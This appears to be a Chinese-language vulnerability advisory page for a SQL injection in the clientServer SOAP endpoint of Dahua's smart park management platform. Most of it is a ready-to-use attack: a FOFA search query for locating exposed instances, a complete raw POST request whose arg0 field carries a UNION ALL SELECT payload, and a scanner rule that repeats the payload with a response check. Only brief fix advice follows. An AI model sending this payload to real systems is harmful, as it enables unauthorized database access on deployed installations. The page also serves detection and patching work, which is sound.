大华智慧园区综合管理平台 clientServer SQL注入漏洞
发布时间
阅读量:
阅读量
产品简介
基于大华科技打造的智慧园区综合管理平台
漏洞概述
该系统在处理大华智慧园区综合管理平台的clientServer接口时未能有效过滤用户的输入数据,并将其未经验证的内容直接整合到系统中的SQL查询语句中。这引发了严重的SQL注入漏洞。潜在的远程未授权攻击者可利用此漏洞获取敏感信息,并从而进一步可能导致目标系统的权限被非法获取。
复现环境
FOFA:app=”dahua-智慧园区综合管理平台”

漏洞复现
Poc
POST /portal/services/clientServer HTTP/1.1
Host: your-ip
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<cli:getGroupInfoListByGroupId>
<!--type: string-->
<arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
<!--type: long-->
<arg1>1</arg1>
</cli:getGroupInfoListByGroupId>
</soapenv:Body>
</soapenv:Envelope>

检测规则POC编写
params: []
name: 大华智慧园区综合管理平台 clientServer SQL注入漏洞
set: {}
rules:
- method: POST
path: /portal/services/clientServer
headers:
Content-Length: "113"
Content-Type: text/xml;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/41.0.2226.0 Safari/537.36
body: |-
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<cli:getGroupInfoListByGroupId>
<!--type: string-->
<arg0>-1) UNION ALL SELECT 1,2,3,4,version()-- -</arg0>
<!--type: long-->
<arg1>1</arg1>
</cli:getGroupInfoListByGroupId>
</soapenv:Body>
</soapenv:Envelope>
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(b'dahua.com') && response.body.bcontains(b'5')&&
response.body.bcontains(b'-log')
groups: {}
detail:
author: ""
links: []
description: ""
version: ""

修复建议
禁止访问来源地址。除非必要,请避免将系统对外开放于互联网。建议升级至安全版本。
全部评论 (0)
还没有任何评论哟~
